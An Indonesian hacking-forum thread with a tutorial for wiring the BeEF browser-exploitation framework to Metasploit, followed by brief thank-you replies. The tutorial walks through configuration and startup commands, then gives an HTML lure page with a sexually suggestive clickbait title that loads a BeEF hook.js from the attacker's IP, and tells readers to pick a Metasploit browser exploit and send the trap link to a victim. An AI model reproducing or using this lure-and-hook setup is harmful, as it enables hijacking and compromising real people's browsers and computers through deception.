[Share] Konfigurasi Beef dengan Metasploit
#1
Sesuai judul kali ini ane bakal share tutorial buat konfigurasi beef dengan metasploit. pada tutorial part 1 ini ane bakal buat sampai metasploit & Beef bisa bekerja sama, untuk part selanjutnya ane bakal lanjutin cara pemakaiannya.

Tutor tested on :

My OS : Kali Linux 1.0.9a
Victim : win XP sp2 on Vmware

Oke ... langsung ke step by step :

1. Change directory ke directory beef, kemudian kita edit file config.yaml nya

root@xcrew:~# cd /usr/share/beef-xss
root@xcrew:/usr/share/beef-xss#nano config.yaml

disini kita akan menkonfigurasi beef ke metasploit, caranya dengan mengubah default parameter untuk metasploit dari false ke true, jika kurang mengerti silahkan liat gambar

Spoiler! :
[Image: Screenshot_from_2014_12_04_15_15_11.jpg]

Kemudian di save

2.  Step selanjutnya change directory ke direkctory Extensions/metasploit yang ada dalam directory beef, dan edit file config.yaml nya

root@xcrew:/usr/share/beef-xss/#cd extensions/metasploit
root@xcrew:/usr/share/beef-xss/extensions/metasploit# ls
api.rb  config.yaml  extension.rb  module.rb  rpcclient.rb
root@xcrew:/usr/share/beef-xss/extensions/metasploit# nano config.yaml

Pada bagian Host, ganti 127.0.0.1 dengan IP anda , begitupun pada bagian callback_host. Kemudian pada bagian {os: 'custom', path, isi dengan lokasi metasploit :  /usr/share/metasploit-framework/

Jika kurang mengerti silahkan lihat gambar :

Spoiler! :
[Image: Screenshot_from_2014_12_04_15_30_45.jpg]

Spoiler! :
[Image: Screenshot_from_2014_12_04_15_31_03.jpg]

3. Langkah selanjutnya kita jalankan metasploitnya

Spoiler! :
[Image: Screenshot_from_2014_12_04_15_45_55.jpg]
[Image: Screenshot_from_2014_12_04_15_48_13.jpg]

4. Sekarang kita load settingan yang sudah kita buat tadi, di console metasploit ketikkan :

msf > load msgrpc ServerHost=<ip anda> Pass=abc123

kok passwordnya : abc123 ? dapetnya dari mana ?
password abc123 merupakan password standart yang bisa kita lihat di config.yaml di directory extensions/metasploit

jika tidak ada kesalahan maka akan muncul seperti gambar di bawah ini :

Spoiler! :
[Image: Screenshot_from_2014_12_04_15_53_14.jpg]

5. Sekarang kita arahkan directory ke directory beef, dan kita buka beefnya.

root@xcrew:/usr/share/beef-xss/extensions/metasploit# cd ..
root@xcrew:/usr/share/beef-xss/extensions# cd ..
root@xcrew:/usr/share/beef-xss# ./beef -x

kok ./beef -x ? maksudnya apa ?
maksudnya -x adalah untuk mereset database beef, kok lama ? yo sabar :3 namanya juga lagi proses Big Grin
jika tidak ada eror maka akan muncul seperti ini :

Spoiler! :
[Image: Screenshot_from_2014_12_04_16_13_52.jpg]

kok ada API eror ? ntu eror karna integrasi metasploitnya, beef tetep working kok Big Grin

6. Sekarang lihat output pas kita buka beef tadi, disono terdapat 2 jenis URL, yang pertama UI panel, yang kedua hook.js

copikan url UI/Panel ke browser anda, maka akan masuk ke panel beef, kemudian login dengan User & password : beef

Spoiler! :
[Image: Screenshot_from_2014_12_04_16_25_01.jpg]

Jika berhasil sampai disini berarti kita sudah berhasil mengkonfigurasi beef & metasploit, selanjutnya ngapaen ? emang kalo udah berhasil bisa apa ? Berhubung stock rokok masih banyak ane lanjutin dah Big Grin.

7. Sekarang kita buat simple script HTML untuk dijadikan umpan nantinya. change directory ke /var/www/ , dalam contoh ini ane buat 1 folder dalam directory var/www dengan nama xcrew. open your terminal and type :

root@xcrew:~# cd /var/www/
root@xcrew:/var/www# mkdir xcrew
root@xcrew:/var/www# cd xcrew
root@xcrew:/var/www/xcrew# nano

kemudian isi dengan code html seperti dibawah ini :

<html>
<head>
<title>Anak SMA Mesum Di Kelas</title>
<script src="http://<ip anda>:3000/hook.js"></script>
</head>
<body>
<img src="mesum.jpg"/>
</body>
<html>

Keterangan :
1. Pada bagian title silahkan pikirkan kata2 yang menurut ente bikin orang tertarik buat ngebuka ntu link
2. Pada bagian Script src, isikan dengan url hook.js yang kita dapat saat starting beef
3. Pada bagian img src, silahkan cari gambar yang mendukung ttitle yang ente buat tadi, kemudian gambar tersebut letakkan di folder var/www/<yourdir>, kalo ane kan naro di dir xcrew
4. kemudian save file dengan nama index.html

jika kurang mengerti silahkan lihat gambar :

Spoiler! :
url hook.js
[Image: Screenshot_from_2014_12_04_16_47_39.jpg]

Spoiler! :
file gambar yang ane taro di dir xcrew
[Image: Screenshot_from_2014_12_04_16_50_39.jpg]


8. Step selanjutnya kita akan mulai membuat exploit untuk victim target, dalam tutor ini ane make exploit buat IE 6 , karna win xp di vmware ane masih make IE 6 , cara ini tidak terbatas untuk Win Xp saja, bisa digunakan untuk semua jenis exploit yang ada di metasploit. so, silahkan pilih sendiri exploit anda, misalnya pengen exploit win 7 ya pada tahap ini tinggal setting exploit buat windows 7 Big Grin



9. Oke .. exploit sudah kita set, selanjutnya berikan link trap kita ke victim ( monggo di pikir ke caranye piye )
ntar page yang kebuka adalah gambar yang kita masukkan kedalam code html kita tadi

url yang kita berikan seperti ini : http://<your Ip >/xcrew/index.html

berhubung victim ane kagak ada flashnye jadi g mau k load picnya :

Spoiler! :
[Image: Screenshot_from_2014_12_04_17_39_19.jpg]

setelah di eksekusi victim sekarang kita masuk ke UI/Panel beef tadi, maka akan jadi gini :

Spoiler! :
[Image: Screenshot_from_2014_12_04_17_43_20.jpg]


selanjutnya silahkan berkreasi Big Grin
Demikian tutorial kali ini, semoga bermanfaat, jika ada pertanyaan monggo ditanyakan ...
jika bersedia ++ nya juga ane g nolak .. Big Grin
jika ada yang salah mohon di perbaiki ...
Jika ada yang janda mohon di bagi :v

Tutorial created by Xcode
salam ...
Aku mah apa atuh ... cuma debu - debu mutiara , meskipun debu namun tetap berharga Smile

#2
+2 Smile) thanks for sharing


Smile and Agree, Then Do Whatever The Fvck You Were Gonna Do



#3
(12-04-2014, 06:52 PM)cyberking Wrote: +2 Smile) thanks for sharing

Wogh ... matur thank Q juga bang Big Grin
semoga bermanfaat
Aku mah apa atuh ... cuma debu - debu mutiara , meskipun debu namun tetap berharga Smile

#4
gambarnya bisa di move ga bro upload ke photobucket , kecil banget gambarnya . nice share , cek kulkas ya

#5
(12-04-2014, 06:56 PM)xsan-lahci Wrote: gambarnya bisa di move ga bro upload ke photobucket , kecil banget gambarnya . nice share , cek kulkas ya

bntar ya bang .. tangan masih pegel Big Grin
dapet jatah makan malam dari bang @xsan-lahci , makasih bang
tapi kalo di klik gede kok picnya bang
Aku mah apa atuh ... cuma debu - debu mutiara , meskipun debu namun tetap berharga Smile

#6
yadah gpp deh bro . keep share






Users browsing this thread: 1 Guest(s)